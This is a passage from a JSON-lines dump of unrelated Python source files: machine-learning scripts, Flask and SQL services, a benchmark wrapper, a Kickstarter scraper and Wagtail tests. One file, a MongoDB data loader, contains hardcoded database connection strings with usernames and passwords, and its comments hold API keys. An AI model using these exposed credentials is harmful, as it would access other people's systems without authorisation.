expr=expr[0:len(expr)-1]+\")\"\n paths.append(expr)\n \n # for i in paths:\n # print(i) \n p=stack.pop() #p.left是term\n #如果是叶子结点 且非访问过\n if(type(p.right.val)==type(\"term\") or p.right==pre):\n if(type(p.right.val)==type(\"term\") and p.right.val==\"True\"):\n p.val=Not(p.val)\n stack.append(p)\n print(len(stack))\n if len(stack)==1:\n paths.append(stack[0].val)\n else:\n expr=\"And(\"\n for i in stack:\n # print(i.val)\n expr=expr+str(i.val)+\",\"\n expr=expr[0:len(expr)-1]+\")\"\n paths.append(expr) \n stack=stack[:-1] \n pre=p\n p=None\n else:\n #非叶子结点\n p.val=Not(p.val)\n stack.append(p)\n p=p.right\n if len(paths)==1:\n print(\"将树转化成表达式需要的时间:\",time.time()-t2ftime)\n return str(paths[0])\n else:\n expr=\"Or(\"\n for i in paths:\n expr=expr+str(i)+\",\"\n #会多出一个逗号\n expr=expr[0:len(expr)-1]+\")\"\n print(\"将树转化成表达式需要的时间:\",time.time()-t2ftime)\n return expr\n\n# def tree2Formula(DT)->str:\n# def bfs(root,path):\n# if not root:return\n# if not root.left and not root.right:\n# #叶子结点为T\n# if root.val==\"True\":\n# # print(path)\n# if len(path)==1:\n# paths.append(path[0].val)\n# else:\n# expr=\"And(\"\n# for i in path:\n# # print(i.val)\n# expr=expr+i+\",\"\n# expr=expr[0:len(expr)-1]+\")\"\n# paths.append(expr) \n# #非叶子结点\n# else:\n# path1=copy.deepcopy(path)\n# path.append(str(root.val))\n# bfs(root.left,path)\n# path1.append((\"Not(\"+str(root.val)+\")\"))\n# bfs(root.right,path1)\n# paths=[]\n# path=[]\n# bfs(DT,path)\n# if len(paths)==1:\n# return str(paths[0])\n# else:\n# expr=\"Or(\"\n# for i in paths:\n# expr=expr+str(i)+\",\"\n# expr=expr[0:len(expr)-1]+\")\"\n# return expr \n\n\nprint(tree2Expr(DT))\nprint(tree2LossingFormula(DT))\n# print(simplify(eval(tree2Formula(DT))))","sub_path":"731/exampleTest/tree2for.py","file_name":"tree2for.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217018496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 11:01:27 2019\n\n@author: Narink\n\"\"\"\nfrom sklearn import svm, datasets, neural_network, metrics\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\ndigits=datasets.load_digits()\nprint(digits.images.shape)\nprint(digits.images[4])\n#print(type(digits.images[0]))\nplt.subplot(121)\nplt.imshow(digits.images[4])\nplt.subplot(122)\nplt.imshow(digits.images[4],cmap=plt.cm.gray_r)\n\nimagereshape=digits.images.reshape(len(digits.images),-1)\nprint(digits.images.shape)\nprint(imagereshape.shape)\nprint(digits.target.shape)\nxtrain,xtest,ytrain,ytest=train_test_split(imagereshape,digits.target,test_size=0.2)\nsvcnaja=svm.SVC(gamma='scale')\nsvcnaja.fit(xtrain,ytrain)\nypredict=svcnaja.predict(xtest)\n\nprint(metrics.confusion_matrix(ytest,ypredict))\nprint(svcnaja.score(xtest,ytest))\n\nimg_label=list(zip(digits.images,digits.target))\n#print(img_label)\nfor index,(img,label) in enumerate(img_label[:4]): \n plt.subplot(4,1,index+1)\n plt.title(label)\n plt.imshow(img,cmap=plt.cm.gray_r)","sub_path":"PreML/testpic.py","file_name":"testpic.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"360672111","text":"from flask import Flask, jsonify, request\nfrom threading import Lock\n\napp = Flask(__name__)\n\npositionLock = Lock()\nposition = None\n\n@app.route('/')\ndef status():\n return 'Robot Updates Service Running...'\n\n@app.route('/robot_position', methods=['GET', 'POST'])\ndef robot_position():\n global position\n ret = jsonify('')\n positionLock.acquire()\n if request.method == 'GET':\n ret = position\n else:\n position = request.form\n positionLock.release()\n return ret\n\napp.run(host='127.0.0.1', port= 5000)","sub_path":"social-robot-new/src/robotUpdatesService.py","file_name":"robotUpdatesService.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333561476","text":"#!/usr/bin/env python3\nimport argparse\nimport collections\nimport enum\nimport re\nimport subprocess\n\nTEST_REPETITION = 3 # repeat each test 3 times and get average\nCOLUMN_ORDER = (\n 'Server Software',\n 'Server Hostname',\n 'Server Port',\n 'Document Path',\n 'Document Length',\n 'Concurrency Level',\n 'Time taken for tests',\n 'Complete requests',\n 'Failed requests',\n 'Non-2xx responses',\n 'Total transferred',\n 'HTML transferred',\n 'Requests per second',\n 'Time per request',\n 'Time per request',\n 'Transfer rate'\n)\n\nTestResult = collections.namedtuple('TestResult', ['commit',\n 'cpu_time',\n 'mem_usage',\n 'worker_time',\n 'ab_fields',\n 'ab_raw'])\nABResult = collections.namedtuple('ABResult', ['commit', 'fields', 'raw'])\nABField = collections.namedtuple('ABField', ['field_text', 'value_text',\n 'name', 'value', 'value_suffix'])\n\n\nclass ABOutTypes(enum.Enum):\n default = 'default'\n\n\ndef parse_default_number(text, value):\n match = re.match(r'([\\d.]+)(.*)', value)\n\n if not match:\n raise ValueError('Value does not contain a number.')\n\n return ABField(field_text=text, value_text=value,\n name=text, value=float(match.group(1)),\n value_suffix=match.group(2))\n\n\ndef parse_default(text, value):\n return ABField(field_text=text, value_text=value,\n name=text, value=value, value_suffix='')\n\n\ndef parse_ab_out(out, type_=ABOutTypes.default):\n field_regex = re.compile(r'\\s*(.+?)\\s*:\\s*(.*)\\s*')\n\n result = []\n\n for i, line in enumerate(out.splitlines()):\n line = line.strip()\n if i < 7 or not line:\n continue\n\n match = field_regex.match(line)\n\n if not match:\n continue\n\n field_text, value_text = match.group(1), match.group(2)\n\n if field_text not in COLUMN_ORDER:\n continue\n\n try:\n ab_field = parse_default_number(field_text, value_text)\n except ValueError:\n ab_field = parse_default(field_text, value_text)\n\n result.append(ab_field)\n\n return result\n\n\ndef prettify_test_result(test_result):\n assert isinstance(test_result, TestResult)\n\n result = ''\n\n result += 'CPU time: {0}\\n'.format(test_result.cpu_time)\n result += 'Memory usage: {0}\\n'.format(test_result.mem_usage)\n result += 'Worker time: {0}\\n'.format(test_result.worker_time)\n\n for ab_field in test_result.ab_fields:\n if ab_field.value_suffix == ' [ms] (mean)':\n result += 'Time per request [ms] (mean): {0}\\n'.format(ab_field.value) # noqa\n elif ab_field.value_suffix == ' [ms] (mean, across all concurrent requests)': # noqa\n result += 'Time per request [ms] (mean, across all concurrent requests): {0}\\n'.format(ab_field.value) # noqa\n else:\n result += '{0}: {1}\\n'.format(ab_field.name, ab_field.value)\n\n return result\n\n\ndef calc_tests_avr(test_results):\n # TODO add asserts\n\n result_ab_fields = []\n sum_time_taken = 0\n sum_reqs_per_sec = 0\n sum_time_per_req_mean = 0\n sum_time_per_req_mean_total = 0\n sum_transfer_rate = 0\n\n for test_result in test_results:\n time_taken_field = next(filter(\n lambda ab_field: ab_field.name == 'Time taken for tests',\n test_result.ab_fields\n ))\n reqs_per_sec_field = next(filter(\n lambda ab_field: ab_field.name == 'Requests per second',\n test_result.ab_fields\n ))\n time_per_req_mean_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean)',\n test_result.ab_fields\n ))\n time_per_req_mean_total_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean, across all concurrent requests)', # noqa\n test_result.ab_fields\n ))\n transfer_rate_field = next(filter(\n lambda ab_field: ab_field.name == 'Transfer rate',\n test_result.ab_fields\n ))\n\n sum_time_taken += time_taken_field.value\n sum_reqs_per_sec += reqs_per_sec_field.value\n sum_time_per_req_mean += time_per_req_mean_field.value\n sum_time_per_req_mean_total += time_per_req_mean_total_field.value\n sum_transfer_rate += transfer_rate_field.value\n\n sample_result = test_results[0]\n\n for field in sample_result.ab_fields:\n if field.name == 'Time taken for tests':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_taken / len(test_results)\n ))\n elif field.name == 'Requests per second':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_reqs_per_sec / len(test_results)\n ))\n elif field.value_suffix == ' [ms] (mean)':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_per_req_mean / len(test_results)\n ))\n elif field.value_suffix == ' [ms] (mean, across all concurrent requests)': # noqa\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_per_req_mean_total / len(test_results)\n ))\n elif field.name == 'Transfer rate':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_transfer_rate / len(test_results)\n ))\n else:\n result_ab_fields.append(field)\n\n return TestResult(\n commit='?',\n cpu_time='?',\n mem_usage='?',\n worker_time='?',\n ab_fields=result_ab_fields,\n ab_raw='?'\n )\n\n\ndef run_test(ab_args):\n ab_args = tuple(str(a) for a in ab_args)\n\n print('Running AB with arguments: `{}`'\n .format(' '.join(ab_args)))\n out = subprocess.check_output(ab_args).decode('utf-8')\n fields = parse_ab_out(out)\n\n git_out = subprocess.check_output(['git', 'log', '--oneline'],\n universal_newlines=True)\n commit = git_out.splitlines()[0]\n\n return TestResult(commit=commit, ab_fields=fields, ab_raw='?',\n cpu_time='?', mem_usage='?',\n worker_time='?')\n\n\ndef run_tests(*, urls, request_numbers, concurrences, headers=[], body):\n for url in urls:\n concurrencies_results = []\n\n for n, c in zip(request_numbers, concurrences):\n concurrency_results = []\n\n for i in range(TEST_REPETITION):\n if body is not None:\n body_arg = ['-p', body]\n else:\n body_arg = []\n\n headers_args = []\n\n for header in headers:\n headers_args.extend(['-H', *header])\n\n ab_args = ['ab', '-n', n, '-c', c,\n *headers_args, *body_arg, url]\n concurrency_results.append(run_test(ab_args))\n\n concurrency_result_avr = calc_tests_avr(concurrency_results)\n concurrencies_results.append(concurrency_result_avr)\n\n print(prettify_test_result(concurrency_result_avr))\n print('---')\n\n sum_time_per_req_mean_total = 0\n\n for result in concurrencies_results:\n time_per_req_mean_total_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean, across all concurrent requests)', # noqa\n result.ab_fields\n ))\n\n sum_time_per_req_mean_total += time_per_req_mean_total_field.value\n\n print('Avr time per request (mean, across all concurrent requests):')\n print(sum_time_per_req_mean_total / len(concurrencies_results))\n print('======')\n\n\ndef namedtuple_to_dict(nt):\n # noinspection PyProtectedMember\n dct = nt._asdict()\n\n for key, value in dct.items():\n if hasattr(value, '_asdict'):\n dct[key] = namedtuple_to_dict(value)\n\n return dct\n\n\ndef percent_encode(char):\n return '%' + hex(ord(char))[2:]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-c',\n help='Space separated list of concurrences to benchmark',\n nargs='+',\n type=int,\n required=True\n )\n parser.add_argument('-u', help='Space separated list of URLs to benchmark',\n nargs='+', required=True)\n parser.add_argument('-n', help='Number of total requests', default=20)\n parser.add_argument('-H', help='Add header, eg. \\'Accept-Encoding: gzip\\' (repeatable)',\n action='append', nargs='*', default=[])\n parser.add_argument('-p', help='File containing body to POST', default=None)\n args = parser.parse_args()\n\n request_numbers = [args.n] * len(args.c)\n run_tests(\n urls=args.u,\n request_numbers=request_numbers,\n concurrences=args.c,\n headers=args.H,\n body=args.p\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hspasov-web-server/scripts/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"494638865","text":"from tortoise.transactions import in_transaction\nimport datetime, pytz\nfrom app.utils.validate_response import response_json\nfrom app.utils.sql_helper import sql_update_builder\nfrom dateutil import parser\nfrom app.utils.json import UUIDEncoder\nimport json\nimport uuid\n\ntz = pytz.timezone('Asia/Bangkok')\n\nasync def init_state_check(current_user):\n try:\n dt = datetime.datetime.now(tz)\n async with in_transaction() as conn:\n query = ( \n \" select * from attendance as a where a.attendance_date = $1 and a.users_uuid_id = $2 order by attendance_id DESC limit 2 \"\n )\n rv = await conn.execute_query_dict(\n query,[ dt.date(), current_user[\"users_uuid\"] ]\n )\n if not rv:\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 0 , \"message\" : \"empty attendance\" } , \n \"status_code\" : 200\n }) \n else:\n if (rv[0]['attendance_type_id'] == 1 ):\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 1 ,\n \"attendance_date\" : str(rv[0]['attendance_date']) ,\n \"attendance_time\" : str(rv[0]['attendance_time']),\n \"attendance_type_id\" : str(rv[0]['attendance_type_id']),\n \"attendance\" : \"already checkin\"} , \n \"status_code\" : 200\n }) \n if (rv[0]['attendance_type_id'] == 2 ):\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 2,\n \"attendance_date\" : str(rv[0]['attendance_date']) ,\n \"attendance_details\" : rv,\n \"attendance\" : \"attendance success\"} , \n \"status_code\" : 200\n }) \n \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { \"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \nasync def insertAttendance(req , current_user):\n try:\n params = req.json\n dt = datetime.datetime.now(tz)\n uuid_entry = str( uuid.uuid4() ) \n async with in_transaction() as conn:\n query = ( \n \" INSERT INTO attendance ( \"\n \" attendance_public_id, attendance_date, attendance_time, attendace_remark, attendance_location, attendance_lat, attendance_long, created, is_active, attendance_method_id, attendance_type_id, users_uuid_id) VALUES \"\n \" ($1 , $2 , $3 , $4 , $5 , $6 ,$7 , $8 ,$9 ,$10 ,$11 ,$12 ) \"\n \" returning attendance_id;\"\n )\n await conn.execute_query(\n query,[ uuid_entry ,dt.date() , dt.time() , params[\"attendance_remark\"], params[\"attendance_location\"] , str(params[\"attendance_lat\"]), str(params[\"attendance_long\"]),dt , True , params[\"attendance_method_id\"] , params[\"attendance_type_id\"] , current_user[\"users_uuid\"] ]\n )\n return ({\n \"status\" : \"Success\" ,\n \"message\" : { \"message\" : \"success\" } , \n \"status_code\" : 201\n }) \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { \"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \nasync def FindUsersAttendance(current_user , month ,years):\n try:\n dt = datetime.datetime.now(tz)\n async with in_transaction() as conn:\n query_checkin = ( \n \" select * from attendance as a \"\n \" where DATE_PART('month' ,a.attendance_date) = $1 \"\n \" AND DATE_PART( 'year',a.attendance_date) = $2 and a.users_uuid_id = $3 and a.attendance_type_id = 1 order by attendance_id ASC \"\n )\n rv_checkin = await conn.execute_query_dict(\n query_checkin,[ int(month), int(years) , current_user[\"users_uuid\"] ]\n )\n query_checkout = ( \n \" select * from attendance as a \"\n \" where DATE_PART('month' ,a.attendance_date) = $1 \"\n \" AND DATE_PART( 'year',a.attendance_date) = $2 and a.users_uuid_id = $3 and a.attendance_type_id = 2 order by attendance_id ASC \"\n )\n rv_checkout = await conn.execute_query_dict(\n query_checkout,[ int(month), int(years) , current_user[\"users_uuid\"] ]\n )\n \n \n \n \n \n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"message\" : \"rv\" } , \n \"status_code\" : 200\n }) \n \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { \"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \n ","sub_path":"Api/app/api/event/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299647540","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nfrom keras.datasets import mnist \nfrom keras.models import Model \nfrom keras.layers import Input, Dense \nfrom keras.utils import np_utils \n\nDATADIR = \"/home/den/n/data\"\n\nCATEGORIES = [\"X\", \"V\"]\n\ndata=[]\nclass_list = []\n\n\nfor category in CATEGORIES: \n path = os.path.join(DATADIR,category) \n for img in os.listdir(path): \n img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) \n data.append(img_array)\n class_list.append(category)\n\n\n#print(class_list)\nnum_class_list=[]\n\nfor i in class_list:\n if i=='X':\n num_class_list.append(0)\n if i=='V':\n num_class_list.append(1)\n#print(num_class_list)\n\nnum_class_arr=np.array(num_class_list)\n#print(num_class_arr)\n#print(type(num_class_arr))\ndata_arr=np.array(data)\n#print(type(data_arr))\n#print(len(data_arr))\n#print(data_arr[0])\n\nbatch_size = 15 # количество обучающих образцов, обрабатываемых одновременно за одну итерацию алгоритма градиентного спуска examples at once\nnum_epochs = 20 # количество итераций обучающего алгоритма по всему обучающему множеству\nhidden_size = 100 #количество нейронов в каждом из двух скрытых слоев MLP\n\nnum_train = 320\nnum_test = 80\n\nheight, width, depth = 95, 95, 1 \nnum_classes = 2 \n\n\nX_train=data_arr[0:320]\ny_train=num_class_arr[0:320]\n\n\nX_test=data_arr[320:400]\ny_test=num_class_arr[320:400]\n\nprint(len(X_train))\nprint(X_train[0])\n\nX_train = X_train.reshape(num_train, height * width) \nX_test = X_test.reshape(num_test, height * width) \n\nX_train = X_train.astype('float32') \nX_test = X_test.astype('float32')\nX_train /= 255 \nX_test /= 255 \n\nY_train = np_utils.to_categorical(y_train, num_classes) \nY_test = np_utils.to_categorical(y_test, num_classes) \n\ninp = Input(shape=(height * width,)) \nhidden_1 = Dense(hidden_size, activation='relu')(inp) # First hidden ReLU layer\nhidden_2 = Dense(hidden_size, activation='relu')(hidden_1) # Second hidden ReLU layer\nout = Dense(num_classes, activation='softmax')(hidden_2) # Output softmax layer\n\nmodel = Model(input=inp, output=out) \n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) \n\nmodel.fit(X_train, Y_train,batch_size=batch_size, nb_epoch=num_epochs) \n\n\n\n","sub_path":"lw4/lab-work/many.py","file_name":"many.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63638118","text":"#!/usr/bin/env python\n#coding:utf-8\n#author:jun.yan@majorbio.com\n#last_modified:20170206\n\nimport re\nimport commands\n\ndef get_line_num(file):\n\tline_num = 0\n\twith open(file,'r') as file_r:\n\t\tfor line in file_r.readlines():\n\t\t\tif re.search(r'.+?\\n',line) and not re.search(r'ccession',line):\n\t\t\t\tline_num = line_num+1\n\treturn line_num\n\t\nfile_inf = commands.getoutput('''for i in *.DE.list;do echo \"${i%%.*}\"* ;done''')\nfile_list = file_inf.split('\\n')\n\nwith open('all_diff_up_down.xls','a')as file_each_a:\n\tfile_each_a.write(\"name\\tall_num\\tdiff_num\\tup_num\\tdown_num\\n\")\nfor file in file_list:\n\tfile_each_name = re.search(r'(.*?)\\.',file).group(1)\n\tall = diff = up = down = 0\n\tfile = file.strip('\\n')\n\tfile_detail = file.split(' ')\n\tfor file_each in file_detail:\n\t\tif re.search('diff\\.exp\\.xls$',file_each):\n\t\t#\tprint(file_each)\n\t\t\tall = get_line_num(file_each)\n\t\tif re.search('DE',file_each):\n\t\t\tdiff = diff+get_line_num(file_each)\n\t\tif re.search('up',file_each):\n\t\t\tup = up+get_line_num(file_each)\n\t\tif re.search('down',file_each):\n\t\t\tdown = down+get_line_num(file_each)\n\twith open('all_diff_up_down.xls','a')as file_each_a:\n\t\tfile_each_a.write(file_each_name+'\\t'+str(all)+'\\t'+str(diff)+'\\t'+str(up)+'\\t'+str(down)+'\\n')\n","sub_path":"get_diff_up_down.py","file_name":"get_diff_up_down.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"169262410","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('eds', '0005_auto_20150709_1608'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='eds',\n options={'ordering': ['idOilCompany'], 'verbose_name_plural': 'Estaciones de servicio'},\n ),\n migrations.AlterModelOptions(\n name='edsproduct',\n options={'ordering': ['idProduct__name'], 'verbose_name_plural': 'Productos y estaciones'},\n ),\n migrations.AlterModelOptions(\n name='product',\n options={'ordering': ['idProject'], 'verbose_name_plural': 'Productos'},\n ),\n migrations.AlterField(\n model_name='edsproduct',\n name='idProduct',\n field=models.ForeignKey(verbose_name=b'Producto', to='eds.Product'),\n ),\n ]\n","sub_path":"ctrleds/apps/eds/migrations/0006_auto_20150709_2042.py","file_name":"0006_auto_20150709_2042.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"276422018","text":"from pymongo import MongoClient\n# from pymongo import InsertOne\nimport datetime\nimport json \nimport pandas as pd\nimport requests \nimport pymongo\n\n\n# import motor.motor_tornado as mt\n# Client = MongoClient(\"mongodb://admin:admin123@ds213715.mlab.com:13715/movapp\",connect=False, serverSelectionTimeoutMS=30000)\n# Client = MongoClient(\"mongodb://anas:anas123@ds247171.mlab.com:47171/qstapp\" , connectTimeoutMS = 30000)\nClient = MongoClient()\n\n\n# Client = MongoClient(\"mongodb://admin:Mohammed.021995@SG-RecSys-18047.servers.mongodirector.com:47456,SG-RecSys-18048.servers.mongodirector.com:47456,SG-RecSys-18049.servers.mongodirector.com:47456/admin?replicaSet=RS-RecSys-0&ssl=true\")\n# Client =MongoClient(\"mongodb://admin:bigdata5@ds247171.mlab.com:47171/qstapp\")\n# db = Client.get_database('movie_rec')\n\n# db = Client['qstapp']\n\ndb = Client.get_database('app_db')\ndb_movies = db.movies\ndb_users = db.users\ndb_ratings = db.ratings\n\n# count = db.rows.count_documents({})\n\n# db_test.insert_one({'i': \"kjdsfsdfjsdlkfn\"})\n# movies = pd.read_csv('movies.dat', sep='::', names=['movie_id','movie_name','movie_tags'])\n# links = pd.read_csv('links.csv', sep=',',dtype=str)\n# links.columns = [\"movie_id\",\"imdbId\",\"tmdbId\"]\n# links.movie_id.apply(int)\n\n# links[\"movie_id\"] = links[\"movie_id\"].astype(int)\n# users = pd.read_csv('users.dat', sep='::', names=['user_id','gender','age','occupation','zip_code'])\n# ratings = pd.read_csv('ratings.dat', sep='::', names=['user_id','movie_id','rating','timestamp'])\n\n\n# n = 3892\n# keys = [\"7db8c464\",\"7db8c464\",\"856db772\",\"25550120\"]\n\n# keys = [\"4b7932ba\",\"ca9c5b\",\"f8a0ad6e\",\"7b7f806c\"]\n\n# keys = [\"3635a730\",\"ca9c5b\",\"f8a0ad6e\",\"7b7f806c\"]\n\n# def get_data(key,movie):\n\n\n# URL = \"http://www.omdbapi.com/\"\n\n# PARAMS = {'i':movie,'apikey':key} \n \n# r = requests.get(url = URL, params = PARAMS) \n# data = r.json() \n# return data\n\n\n# result = pd.merge(movies, links, on='movie_id')\n\n\n# for index, row in result.iterrows():\n\n# if index > -1 : \n# movie = row['movie_name'][:-6].strip()\n# year = row['movie_name'][-5:-1]\n# tags = row['movie_tags'].split(\"|\")\n\n# data = get_data(keys[int(index/(n/4))],\"tt\"+row['imdbId'])\n# # data = {}\n\n# tt = {\"movie_id\":row['movie_id'],\"imdbId\":row['imdbId'],\"movie_name\": movie, \"year\":year,\"tags\":tags, \"data\": data}\n# if not (db_movies.update(tt, tt, upsert = True)['updatedExisting']):\n# print(index,\"insert || \",tt['movie_name'],'||' ,row['movie_name'])\n# else:\n# print(index,\"update || \",tt['movie_name'])\n\ndijob = {0: \"other\" ,\n\t 1: \"academic/educator\",\n\t 2: \"artist\",\n\t 3: \"clerical/admin\",\n\t 4: \"college/grad student\",\n\t 5: \"customer service\",\n\t 6: \"doctor/health care\",\n\t 7: \"executive/managerial\",\n\t 8: \"farmer\",\n\t 9: \"homemaker\",\n\t 10: \"K-12 student\",\n\t 11: \"lawyer\",\n\t 12: \"programmer\",\n\t 13: \"retired\",\n\t 14: \"sales/marketing\",\n\t 15: \"scientist\",\n\t 16: \"self-employed\",\n\t 17: \"technician/engineer\",\n\t 18: \"tradesman/craftsman\",\n\t 19: \"unemployed\",\n\t 20: \"writer\"}\n\n\nfor doc in db_users.find():\n myquery = doc\n newvalues = { \"$set\": { \"work\": dijob[doc[\"occupation\"]] } }\n\n print(db_users.update_one(myquery, newvalues))\n# # print(movies.head())\n# # print(\"start\")\n# # client_db.movies.insert(json.loads(movies.T.to_json()).values())\n# # print(\"movies done\")\n# # client_db.users.insert(json.loads(users.T.to_json()).values())\n# # print(\"users done\")\n# # client_db.ratings.insert(json.loads(ratings.T.to_json()).values())\n# # print(\"ratings done\")\n\n\n# # cursor_excess_new = (\n# # crows.find() \n# # .sort([(\"_id\", 1)])\n# # )\n\n# # queries = [InsertOne(doc) for doc in cursor_excess_new]\n# # srows.bulk_write(queries)\n","sub_path":"transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391224509","text":"import requests\nfrom geopy.geocoders import Nominatim\nfrom geopy.point import Point\n# from geopy.geocoders import GoogleV3\nfrom currency_converter import CurrencyConverter\nfrom datetime import datetime, timedelta\nfrom .models import DB, Project\nfrom bs4 import BeautifulSoup\nimport re\n\n\n# DB = models.DB\n\ndef add_new_project(url):\n \"\"\"\n Requests data from a html page\n :param url:\n :return:\n \"\"\"\n try:\n slug = re.search('/projects/(.*)\\?', url).group(1)\n\n session = requests.Session()\n request = session.get(url)\n soup = BeautifulSoup(request.text, 'html.parser')\n xcsrf = soup.find(\"meta\", {\"name\": \"csrf-token\"})[\"content\"]\n\n query = \"\"\"\n query Campaign($slug: String!) {\n project(slug: $slug) {\n id \n name\n category {\n name\n parentCategory {\n name\n }\n }\n location {\n displayableName \n }\n goal {\n currency\n amount\n }\n deadlineAt\n duration\n state\n description\n __typename\n }\n }\"\"\"\n\n r = session.post(\"https://www.kickstarter.com/graph\",\n headers={\n \"x-csrf-token\": xcsrf\n },\n json={\n \"query\": query,\n \"variables\": {\n \"slug\": slug\n }\n })\n\n result = r.json()['data']['project']\n\n # get parameters from the data\n id = result['id']\n name = result['name']\n category = result['category']['name'].lower()\n parent_category = result['category']['parentCategory']['name'].lower()\n category_slug = parent_category + \"/\" + category\n town, country_code = town_country(result['location']['displayableName'])\n goal_amount = to_usd(result['goal']['amount'], result['goal']['currency'])\n deadline_at = datetime.fromtimestamp(result['deadlineAt'])\n launched_at = when_launched(result['duration'], result['deadlineAt'])\n description = result['description']\n\n # add new project to the database\n db_project = Project(id=id, name=name, category_name=category,\n category_slug=category_slug, goal_amount=goal_amount,\n description=description, launched_at=launched_at,\n deadline_at=deadline_at, country_code=country_code,\n town=town)\n DB.session.add(db_project)\n\n except Exception as e:\n print(\"Error processing {}: {}\".format(url, e))\n raise e\n\n else:\n # return result['location']['displayableName']\n DB.session.commit()\n\n\ndef to_usd(amount, currency):\n \"\"\" Converts any sum into dollar\n :param amount : amount of money (int)\n :param currency: currency (int)\n :return: int\n \"\"\"\n c = CurrencyConverter(fallback_on_missing_rate=True, fallback_on_wrong_date=True)\n dollar = c.convert(amount, currency, 'USD', date=datetime.today())\n return dollar\n\n\ndef when_launched(duration, deadline):\n \"\"\"Calculate launchedAt based on the deadline and duration\n :param duration: duration (int)\n :param deadline: deadline (datetime)\n :return: launchedAt (datetime)\n \"\"\"\n duration = timedelta(days=duration)\n deadline = datetime.fromtimestamp(deadline)\n launched_at = deadline - duration\n return launched_at\n\n\ndef town_country(location):\n \"\"\"\n :param location:\n :return:\n \"\"\"\n geolocator = Nominatim(user_agent=\"flask_app\")\n address, (latitude, longitude) = geolocator.geocode(location, language=\"en\")\n location = geolocator.reverse((latitude, longitude), language=\"en\")\n if 'city' in location.raw['address']:\n country = location.raw['address']['city'] + ', ' + location.raw['address']['country']\n else:\n country = location.raw['address']['hamlet'] + ', ' + location.raw['address']['country']\n country_code = location.raw['address']['country_code'].upper()\n return country, country_code\n # return location.raw['address']\n\n\n\nif __name__ == 'main':\n pass\n\n","sub_path":"flask_app/kickstarter.py","file_name":"kickstarter.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285003741","text":"import warnings\n\nfrom django.test import TestCase\n\nfrom wagtail.wagtailsearch import indexed\nfrom wagtail.tests import models\nfrom wagtail.tests.utils import WagtailTestUtils\n\n\nclass TestContentTypeNames(TestCase):\n def test_base_content_type_name(self):\n name = models.SearchTestChild.indexed_get_toplevel_content_type()\n self.assertEqual(name, 'tests_searchtest')\n\n def test_qualified_content_type_name(self):\n name = models.SearchTestChild.indexed_get_content_type()\n self.assertEqual(name, 'tests_searchtest_tests_searchtestchild')\n\n\nclass TestIndexedFieldsBackwardsCompatibility(TestCase, WagtailTestUtils):\n def test_indexed_fields_backwards_compatibility(self):\n # Get search fields\n with self.ignore_deprecation_warnings():\n search_fields = models.SearchTestOldConfig.get_search_fields()\n\n search_fields_dict = dict(\n ((field.field_name, type(field)), field)\n for field in search_fields\n )\n\n # Check that the fields were found\n self.assertEqual(len(search_fields_dict), 2)\n self.assertIn(('title', indexed.SearchField), search_fields_dict.keys())\n self.assertIn(('live', indexed.FilterField), search_fields_dict.keys())\n\n # Check that the title field has the correct settings\n self.assertTrue(search_fields_dict[('title', indexed.SearchField)].partial_match)\n self.assertEqual(search_fields_dict[('title', indexed.SearchField)].boost, 100)\n\n def test_indexed_fields_backwards_compatibility_list(self):\n # Get search fields\n with self.ignore_deprecation_warnings():\n search_fields = 